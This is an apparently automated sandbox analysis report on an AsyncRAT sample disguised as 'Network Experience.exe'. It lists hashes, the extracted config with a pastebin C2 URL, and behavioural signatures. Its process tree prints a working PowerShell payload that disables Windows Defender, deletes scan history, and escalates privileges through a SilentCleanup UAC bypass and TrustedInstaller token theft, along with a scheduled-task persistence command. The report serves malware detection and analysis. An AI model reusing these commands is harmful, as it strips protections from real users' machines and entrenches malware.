Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09/11/2024, 12:50
Behavioral task
behavioral1
Sample
Network Experience.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
Network Experience.exe
Resource
win10v2004-20241007-en
General
-
Target
Network Experience.exe
-
Size
74KB
-
MD5
a1e76f2fbe7af658b38383fbfd7cfff4
-
SHA1
6dc43ef73b59ff29089a4b29bc8ade4ea63484ec
-
SHA256
7782da3a91f91377c4c8d1d338237c6ff996ad42caaab27c1cdc5ea7e90058e1
-
SHA512
4a47391ba3132cfb36da8d7f08ae6856312b26547845e3fe5f3ddd0939893245bf4de337671bc917926d5c764a6100d084845236ef1707560ff5be4aa5f2bed8
-
SSDEEP
1536:rUa8cxqnHXC56PMVwKCpaIPr1bg/VkxLN+QzcoVVclN:rUrcxq3O6PMVQpLr1bg9kxQQJ3Y
Malware Config
Extracted
asyncrat
Venom Pwn3rzs' Edtition v6.0.1
proxy on top
gdfgvsdfdasfkjasdkjaske9831943ioqwkd
-
delay
1
-
install
true
-
install_file
NetworkEX.exe
-
install_folder
%AppData%
-
pastebin_config
https://pastebin.com/raw/jGuGV3jT
Signatures
-
Asyncrat family
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection powershell.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2572 created 4024 2572 powershell.exe 97 -
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x000d000000023a73-12.dat family_asyncrat -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation Network Experience.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation NetworkEX.exe -
Executes dropped EXE 1 IoCs
pid Process 4568 NetworkEX.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 3424 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 14 pastebin.com 15 pastebin.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpC357.tmp.png" NetworkEX.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1924 sc.exe 660 sc.exe 3248 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 3744 timeout.exe -
Modifies Control Panel 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Desktop\WallpaperStyle = "2" NetworkEX.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Desktop\TileWallpaper = "0" NetworkEX.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2308 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 32 IoCs
pid Process 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 1508 Network Experience.exe 4568 NetworkEX.exe 4568 NetworkEX.exe 4568 NetworkEX.exe 2572 powershell.exe 2572 powershell.exe 2572 powershell.exe 3424 powershell.exe 3424 powershell.exe 3424 powershell.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
description pid Process Token: SeDebugPrivilege 1508 Network Experience.exe Token: SeDebugPrivilege 4568 NetworkEX.exe Token: SeDebugPrivilege 2572 powershell.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 1152 whoami.exe Token: SeDebugPrivilege 3424 powershell.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe Token: SeDebugPrivilege 4984 whoami.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4568 NetworkEX.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 1508 wrote to memory of 4996 1508 Network Experience.exe 86 PID 1508 wrote to memory of 4996 1508 Network Experience.exe 86 PID 1508 wrote to memory of 4880 1508 Network Experience.exe 87 PID 1508 wrote to memory of 4880 1508 Network Experience.exe 87 PID 4996 wrote to memory of 2308 4996 cmd.exe 90 PID 4996 wrote to memory of 2308 4996 cmd.exe 90 PID 4880 wrote to memory of 3744 4880 cmd.exe 91 PID 4880 wrote to memory of 3744 4880 cmd.exe 91 PID 4880 wrote to memory of 4568 4880 cmd.exe 96 PID 4880 wrote to memory of 4568 4880 cmd.exe 96 PID 4568 wrote to memory of 2572 4568 NetworkEX.exe 102 PID 4568 wrote to memory of 2572 4568 NetworkEX.exe 102 PID 2572 wrote to memory of 1924 2572 powershell.exe 104 PID 2572 wrote to memory of 1924 2572 powershell.exe 104 PID 2572 wrote to memory of 1428 2572 powershell.exe 105 PID 2572 wrote to memory of 1428 2572 powershell.exe 105 PID 2572 wrote to memory of 1152 2572 powershell.exe 107 PID 2572 wrote to memory of 1152 2572 powershell.exe 107 PID 2572 wrote to memory of 2508 2572 powershell.exe 108 PID 2572 wrote to memory of 2508 2572 powershell.exe 108 PID 2572 wrote to memory of 3424 2572 powershell.exe 109 PID 2572 wrote to memory of 3424 2572 powershell.exe 109 PID 3424 wrote to memory of 660 3424 powershell.exe 111 PID 3424 wrote to memory of 660 3424 powershell.exe 111 PID 3424 wrote to memory of 3268 3424 powershell.exe 112 PID 3424 wrote to memory of 3268 3424 powershell.exe 112 PID 3424 wrote to memory of 4984 3424 powershell.exe 114 PID 3424 wrote to memory of 4984 3424 powershell.exe 114 PID 3424 wrote to memory of 2944 3424 powershell.exe 115 PID 3424 wrote to memory of 2944 3424 powershell.exe 115 PID 3424 wrote to memory of 3248 3424 powershell.exe 116 PID 3424 wrote to memory of 3248 3424 powershell.exe 116 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Network Experience.exe"C:\Users\Admin\AppData\Local\Temp\Network Experience.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NetworkEX" /tr '"C:\Users\Admin\AppData\Roaming\NetworkEX.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "NetworkEX" /tr '"C:\Users\Admin\AppData\Roaming\NetworkEX.exe"'3⤵
- Scheduled Task/Job: Scheduled Task
PID:2308
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp807A.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:3744
-
-
C:\Users\Admin\AppData\Roaming\NetworkEX.exe"C:\Users\Admin\AppData\Roaming\NetworkEX.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend5⤵
- Launches sc.exe
PID:1924
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"5⤵PID:1428
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1152
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller5⤵PID:2508
-
-
-
-
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4024
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender Real-time Protection settings
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3424 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:660
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:3268
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵PID:2944
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
